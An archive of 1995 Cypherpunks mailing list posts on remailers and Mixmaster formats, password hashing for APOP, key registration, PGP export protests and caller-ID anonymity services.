OK, OK, OK--

Robbie Westmorland has persuaded me that an action alert before
the bill has been "calendared" could be counterproductive. The reason
is that until the bill is scheduled to come before a committee, many
do not know it exists, and we do not want to tell them! There is a
possibility that the bill might be quietly forgotten about, up to the time
that it is "calendared".


Is there any reason we could not prepare an action alert in advance
to be released immediately when/if it is scheduled to come before
a subcommittee?

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMBKzH/BUQYbUhJh5AQFOYQQAjZoFcyAAvncyuwG/fS76gdVuQp5ZrF/M
sHgRk6sRgOKkl0qLBZKlTD14y00r1LaUXgncdJ81usArj7wV+l38Y10+3YALRtl+
RtyqAdeND4rGLgx940juVbnNzMEC8bq4xQJYHUZSFXSrJmEqw0+CmOuMKPrDn44z
4Dcvhg1n94M=
=tibc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 24 Jul 95 01:36:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: big word listing
Message-ID: <8ADC4F8.000300024C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


AS> >  <process-ID.clock@hostname>password
AS> >
AS> >and sends it to the server as "APOP username 58349485whatever89583449".

AS> Of course, this requires the user password to be stored unencrypted on the
AS> server; which you may not want to do.

  Here's a variation, then: Instead of using process-id.clock to
generate the random stuff for the challenge, have your own (P)RNG make
up a bunch of them ahead of time, calculate the hashes, and store the
challenges and hashes on the server.

  The password file is kept encrypted, and only decrypted to run the
above. You could even do the whole thing by remote access, making up a
batch of id: pairs of challenge/repsonse on one machine, encrypt the
thing and send it to the server via remailer chain.

  The reason for the "stealth" bit is because the locus of control is
moved to the remote machine, which may itself fall prey to attack. So,
the supervisor needs to login as a Mere User (could have several
accounts like this, and/or change them frequently) so as to not leave a
trail of bread crumbs back to the cottage.



 * Long, long ago, in a tagline far far away...
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 23 Jul 95 21:37:28 PDT
To: John Young <cypherpunks@toad.com
Subject: Re: OVR_byt
Message-ID: <199507240435.VAA11139@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 23 Jul 95 21:38:43 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <199507240435.VAA11194@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:36 PM 7/23/95 -0400, Robert Hettinga wrote:
>The reason that Netscape has either built-in news reading or mail reading
>functions is feature creep.  [....]
>  In-line gifs or jpegs (or mpegs or whatever) are integral to
>the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
>I think.  My opinion about e-mail and news are that they're pretty
>orthogonal to the functionality of a web-browser.  

When you're building software to run portably across a variety of
operating systems with varying levels of multitaskability or brain-damage,
building a big monolith with good modularity inside seems a reasonable
compromise,
and it means you don't have to do as much work to define interfaces that
talk to everybody else's cool application program.  Since URLs are designed
to let you point to just about anything, it's real nice if your browser client
can actually do something useful with any URL it finds.  I think that includes
sending mail in response to mailto:s (though not receiving it; that's really
Somebody Else's Problem), and at least popping up a crude newsreader to
read news: URLs.  

It would certainly be nicer to have a system that's
aggressively tool-based with obvious interfaces chosen to call other
applications
if the user configures them instead of the default app.  On Unix that's
usually easy
(fork/exec with some appropriate command-line args and popular data formats);
on Macs it's not too bad; on DOS, well, anyway.  Winsock at least means that
Windows applications have some chance of using the network compatibly at the
same time, which was previously a major annoyance; now it just makes it
harder to
use the _Microsoft_ clients along with Netscape and your other cool apps,
but hey.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 23 Jul 95 21:49:29 PDT
To: stewarts@ix.netcom.com
Subject: Re: Government Mandated Keys
Message-ID: <ac38738903021004b440@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 PM 7/22/95, Dan Bailey wrote:
>On Wed, 19 Jul 1995 11:39:07 -0700 you wrote:
>
>>At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>>>I want to register the 1-bit key of "1".  I expect to
>>>send about half my message bits encrypted, the rest will be clear-text.
>>
>>Oh, go ahead, register 0 also.  You'll probably want to switch keys
>>occasionally during sessions.
>
>Actually, why don't we just register our favorite geometric constant,
>pi?  Assuming it's non-repeating, and non-terminating, you're
>guaranteed that whatever key you end up using will be somewhere in pi.

Reasons this won't work:

1. The Real Reason: It's terminally cute, and terminally cute arguments
rarely stand up in court.

2. The Technical Reason: As I recollect, it is unproven that "any sequence
of digits will appear in pi someplace." (It may be expected that any finite
sequence will eventually appear, but I'm unaware of any proof, and I have
reason to suspect such a proof might be impossible.). A wise-ass judge--not
that any court in the rational (or irrational) world would ever deal with
this--could demand proof.

3. The Legalistic Reason: The "key registration" law would likely be
phrased in terms of direct opening of messages, not existential trickery
about "the set of all keys."

I urge that we deal with key registration on more plausible bases than
trickery and sophistry.

(How may keys can dance on the head of a PIN, and all.)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sun, 23 Jul 95 22:09:55 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: speeding detected by civilians
Message-ID: <m0saFdX-007NLKC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote:
>hate to start another endless thread on speeding limits, but
>this is an interesting privacy anecdote... hope this hasn't
>been posted here.
>
>
>===
>
>From: "Steven M. Horvath" <horvath@comm.mot.com>
>Subject: Speeder's Beware of Vernon Hills, IL.
>To: snet-l <snet-l@world.std.com>
>
>- - -------- FYI------------------FYI--------------------FYI-----------------
>
>Vernon Hills, IL.
>
>Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>citizens to check out radar guns from the local police department to 
>catch speeders in their community. The radar guns are combined with 
>cameras in order to instantaneously capture the car, license number, and the 
>rate of speed. The citizens can check out the units for a week at a time. The 
>police have stated that they, at this time, will use the data to issue 
>warning letters to the violaters.
>
>
>
>
>
>
>- ------- End of Forwarded Message

Actually... this sounds like a GREAT IDEA!!! Do you know how many cops you 
could catch with one of those??? I cannot count the times I've had cops go by
me at speeds in excess of 80 mph without lights or sirens! Everyone ought to 
check one of those things out, catch the cops and turn it in to your local media
establisment!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF - IRChat) 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMBMV/4SAJOVFNaChAQEO0wf/W8Nudez5Xu6+VqomN6jlE5aKixkNz59M
UTh9y57zRMuYr1sE1abqr90kmANwo6bG8CmOmn1CS9vnGjvhzO4MeJJGfsc3elwT
EMXTJy4Er5DPoswqUehNKghKvoNEvxL0+CUcTVjkMNCrOt6O5oetUq4hzPBKwC8a
G98Mk8uTZ64YpU1IIZQmHaZrUgA0DpV2tDFA3vX4dSxpeKYP0EHmEIeV1jL8kax+
/DQqYYzYaQYGjfA7bAo6d9jBJkjlPqSYiJVnjTKSScqF7ke31nPfNMCC1B+XdhpQ
G7+rDEcyFubj0awwV8liYE7dnM3j0wxAy9hb0fzNINUv5xNjbj3KTA==
=sx7M
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Sun, 23 Jul 95 21:05:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: MOSS and Mixmaster: A Media Type Proposal
In-Reply-To: <9507090007.AA06052@snark.imsi.com>
Message-ID: <199507240403.AAA00248@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:
>>> It would be very, very good if everyone doing secure mail systems of
>>> one sort or another (including PGP integrated mail packages and
>>> remailers) slowly moved forward to the formats described in this
>>> document, which is now a proposed internet standard...

The IESG writes:
> The IESG has approved the following two Internet-Drafts as Proposed
> Standards:
> 
>  1. MIME Object Security Services <draft-ietf-pem-mime-08.txt>
>  2. Security Multiparts for MIME: Multipart/Signed and
>     Multipart/Encrypted
> 	<draft-ietf-pem-sigenc-03.txt>
> 
> These documents are the product of the Privacy-Enhanced Electronic Mail
> Working Group. The IESG contact person is Jeffrey Schiller.
> 
> 
> Technical Summary
> 
> These documents describe a general framework for security within MIME
> (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering
> Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt).
> Support is provided for digital signatures on MIME objects (both simple
> and compound) as well as for confidentiality provided through data
> encryption.

I've spent some time reading these proposed standards, along with parts of
RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to
get a sanity check and comments before I consider proceeding with submission
to the IETF Media Types review list, etc.

I propose a new Media Type subtype for Mixmaster remailer packets,
"application/mixmaster". (For the purposes of this message, "Mixmaster
remailer packet" refers to a packet generated by a Mixmaster server or client,
and intended for transmission to a Mixmaster server. It does *not* cover
messages generated by a Mixmaster server that are intended for an ultimate
message recipient.) This is intended to be an experimental protocol
for use in the control part of a multipart/encrypted message. 

There is one required parameter, "version", meant to indicate the version
number of the originating Mixmaster software.  In addition, one optional
parameter, "key-id", may be included. If present, this parameter would
indicate the single line key prefix/ID of the public Mix key used to
encrypt (at the outermost layer) the contents of the application/mixmaster
part. This might be used to thoroughly disambiguate decryption options in
the event that the recipient server has more than one currently active
public Mix keys.

The application/mixmaster (control) part of the multipart/encrypted message 
would contain the padded list of Mixmaster server hop headers, superencrypted 
at the outermost layer with a public Mix key (presumably, one belonging to the
recipient server). A single decryption of these headers should reveal the
IDEA key used to superencrypt, at the outermost layer, the body part of the
multipart/encrypted message. The application/octet-stream (body) part of the
multipart/encrypted message would contain the list of ultimate recipients of
the remailed message, the text of the message itself, and any additional 
processing instructions to the final Mix server. The latter, body part of
the multipart/encrypted message shall have been encrypted by the originator
using the IDEA key specified in the former, control part.

The contents of the application/mixmaster part should be encoded in
accordance with the standards for application/octet-stream.

(NB: this amounts to a division of the extant Mixmaster packet format 
roughly into a control section and a body ("payload") section.)

Comments ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 24 Jul 95 07:00:59 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507241400.HAA24724@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 24 Jul 95 6:07:21 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *+**********    12:38  99.99%
spook    remailer@spook.alias.net         *--*********    25:21  99.99%
flame    remailer@flame.alias.net         +-++++++++++    57:34  99.99%
replay   remailer@replay.com              *+****++***+    13:12  99.99%
rmadillo remailer@armadillo.com           +++++++++++     49:13  99.99%
crown    mixmaster@kether.alias.net       --+-+++-+--+  1:25:56  99.98%
bsu-cs   nowhere@bsu-cs.bsu.edu           ###*-#*#****    13:47  99.98%
portal   hfinney@shell.portal.com         #######*****     4:03  99.96%
vishnu   mixmaster@vishnu.alias.net       ++*******+**    13:36  99.73%
gondolin mixmaster@gondolin.org           +*----*-----  1:45:44  99.73%
vox      remail@vox.xs4all.nl             .------.--   15:58:51  99.99%
ideath   remailer@ideath.goldenbear.com   ........-.   14:21:20  99.32%
ford     remailer@bi-node.zerberus.de     #-#+#++-**-*    39:46  99.26%
extropia remail@extropia.wimsey.com       _ --. -..--  13:25:43  99.20%
hroller  hroller@c2.org                   +*-++#+#*--*  1:13:04  99.05%
syrinx   syrinx@c2.org                    +-------- --  3:28:31  99.01%
penet    anon@anon.penet.fi                --+++------  8:45:41  98.69%
alumni   hal@alumni.caltech.edu           #*#**  *****     4:36  97.24%
rahul    homer@rahul.net                  *##+-##***++    10:07  99.98%
rebma    remailer@rebma.mn.org            +--+-.-+_.-  21:34:08  86.95%
c2       remail@c2.org                    ++-+++-  --   2:41:11  85.54%
mix      mixmaster@remail.obscura.com            ---+   3:12:31  77.55%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Mon, 24 Jul 95 05:48:06 PDT
To: cypherpunks@toad.com
Subject: crypto-stegonography?
Message-ID: <199507241239.HAA16213@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I got to thinking about crypto and stego, and wondered if it wouldn't
conceivably be a useful technique to marry crypto and stego in the following
manner (probably thought of before :-):

1> encrypt a message in the Usual Manner.
2> by prior arrangement with the other party (or parties, more on that in a
moment), select a random character that has a bit position value equal to a
bit in the encrypted message. That is, if the first bit of your encrypted
message was a '0', randomly select a character that had a '0' in a specific
bit position (say, bit 3). repeat for remainder of message.
3> transmit said message, mimicing any one of a number of formats.

I think such a scheme would have a number of benefits, in that it could
_conceivably_ support up to 8 recipients (8 different messages encrypted
independently), though 6 would probably be a practical limit. The message
could easily be formatted to resemble a uuencoded image or almost anything
else (with minimal prior arrangement). It maintains real encryption while
providing a considerable 'distractor' effect on an opponent (ie, the old
magician's trick of "watch this hand while I do the real stuff with the
other one" :-). With the same message sent to multiple recipients, the
_apparent_ harmlessness of the message would seem to increase, as well.

For a single recipient, the bandwidth requirements really sucks rocks, but
for multiple recipients, the efficiency goes *way* up.

As observed, this has probably been thought of before, but I'd be interested
in hearing any comments....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Mon, 24 Jul 95 07:03:09 PDT
To: cypherpunks@toad.com
Subject: Now You Can Own a 'Munitions Tshirt'
Message-ID: <199507241414.IAA19908@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Goverment. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cyrptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitons 
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to dhenson@itsnet.com with the subject of 
'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 24 Jul 95 05:27:19 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507231958.AA00910@snark.imsi.com>
Message-ID: <199507241221.MAA00651@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

R$ wrote:
> > I have serious concerns about whether the DNS stuff will really scale.
> > It's gonna blow out DNS server memory use, and the bigger packets means
> > a *lot* more TCP (vs UDP) activity.

Perry wrote:
> I'm not that worried. HESIOD has already shown that you can afford to
> store really mongo databases in the DNS, and with caching I suspect
> the TCP activity isn't going to be over very wide distances for the
> most part. 

Perry's right.

With a fairly current BIND (named), MIT stores on the order of 100-200
bytes of data per Athena user for ~25000 users.  MIT's been doing this
for years; for the longest time, they were using ~1 MIPS Vaxstation
II's with ~9MB of memory as DNS servers.  

1024 bit RSA public keys are ~128 bytes, as are digital signatures.
If we allow framing and similar stuff to expand the size of the data
to 150 bytes per key/signature, and if each user had a signed key in
the DNS, this would roughly triple the amount of data in the DNS.

This Is Not A Problem.

I haven't looked at the CPU load needed to compute the signatures, but
that takes place off-line, not on-line.

					- Bill



-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMBOQTbT+rHlVUGpxAQEwrgP9HRftK+uw1zDQuLEy8uCe58QHwVXNXJTy
8fxoK5+k7d56/k55l6yVjTrBUnSCRZibukQLididjnkDr3P7Qv3cdafkkSxxTY/5
PMeDL3lYZ2GhjNBkVvRt554b1iL/Gaq/ckbwTpVvcMeUeN0HqWvYMEXnqTIzye8u
1i9kqo6ENiw=
=fqe9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Mon, 24 Jul 95 05:49:17 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507241249.IAA28264@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Monty Harder <monty.harder@famend.com> wrote:
 Andrew Spring <ANDREW.SPRING@PING.BE> wrote:
>AS> >  <process-ID.clock@hostname>password
>AS> >
>AS> >and sends it to the server as "APOP username 58349485whatever89583449".
>
>AS> Of course, this requires the user password to be stored unencrypted on the
>AS> server; which you may not want to do.
>
>  Here's a variation, then: Instead of using process-id.clock to
>generate the random stuff for the challenge, have your own (P)RNG make
>up a bunch of them ahead of time, calculate the hashes, and store the
>challenges and hashes on the server.

Instead of that, send H(pid,clock,hostname,H(password)) to the server, for
some hash function H().  Then the server only needs to keep H(password) 
around, rather than the plain password.  This is similar to current
systems, except the plain password isn't sent across the network.

H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc.  Of course,
I'm sure this is far from being a new idea....

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 24 Jul 95 07:30:45 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <9507241429.AA00433@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
>  Does it have to be the case, then, that we even have separate client
>  and server versions? If a new program is going to be written in
>  Java, can't it have the functionality of both client and server?
>
>  Why not "charge" for the ability to send an anonymous message with
>  the duty to have for a short time (maybe an hour or two) running
>  on your machine a node in a remailer network?

Futplex writes:
>  It would be interesting to see how the market would react to this.
>  There might be quite a bit of reluctance to take on the liability
>  of a remailer operator just to send an anonymous message (maybe
>  that's a good thing ;)

Running a remailer is forbidden by many ISP usage agreements.  Many of the  
potential users of a remailer may not be able to 'pony-up' a few hours of  
remailer operation lest they loose their account.  I thought the idea was to  
get more people using the remailers, not fewer (perhaps just fewer  
abusers)...

Also, users must be aware of a remailer (and have its public key) to use it.   
I suppose you could temporarily add the user to a web page which clients  
checked for a list of current remailers.  However, there are issues of  
reputations of long-running remailers, etc...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 24 Jul 95 06:37:24 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CALLER ID AVOIDANCE
In-Reply-To: <Pine.SUN.3.91.950722142036.20705B-100000@crl4.crl.com>
Message-ID: <Pine.SUN.3.91.950724093514.18673A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Jul 1995, Sandy Sandfort wrote:

> Date: Sat, 22 Jul 1995 14:27:50 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: CALLER ID AVOIDANCE
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> While reading the July issue of Soldier of Fortune, I ran across
> an ad for yet another telephone anonymity service.  It reads:
> 
> 			CALL 1-900-CUT TRAX
> 
> 	Secure your most sensitive calls from all forms of
> 	caller I.D. and return-call technologies?
> 
> 	Now make calls from your own telephone safely and
> 	anonymously.  No need to find a public phone to
> 	be discreet.
> 
> 	Trackers never see your number...only ours!  And
> 	their number will not appear on your phone bill.
> 
> 	Call any number in the continental US...
> 
> 	Just $3.95 a minute for safe secure conversations!
> 
> 	Call 1-900-CUT-TRAX (1-900-288-8729)
> 	Beacon Telesystems 914-423-3329
> 
> Not necessarily as secure as they would have you believe, but
> it does demonstrate there is a market for anonymity, I guess.

If one can afford it, I suggest chaining through 
1-900-CUT-TRAX
and
1-900-STO-PPER

There was some talk of one or the other of these services halting access 
to other 1-900 numbers.  Haven't used it recently enough to know if it 
still works.

> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Mon, 24 Jul 95 06:35:04 PDT
To: cypherpunks@toad.com
Subject: Re: NOISE: advice on applications
Message-ID: <9507241334.AA06479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I've just recently set up a PPP account, mainly so I could 
> run Netscape.  I'm thinking of adding PC Eudora for mail.
> Any advice on a good newsreader and any other applications
> it would be handy to have?
> Thanks.
> AR 

     While I have yet to find the Perfect PC Mail Client,
I have to say that I find Pegasus far superior to Eudora. The free
version of Pegasus includes mail filtering capabilities, essential
if you expect to receive mailing lists (such as cypherpunks).



Peter Trei
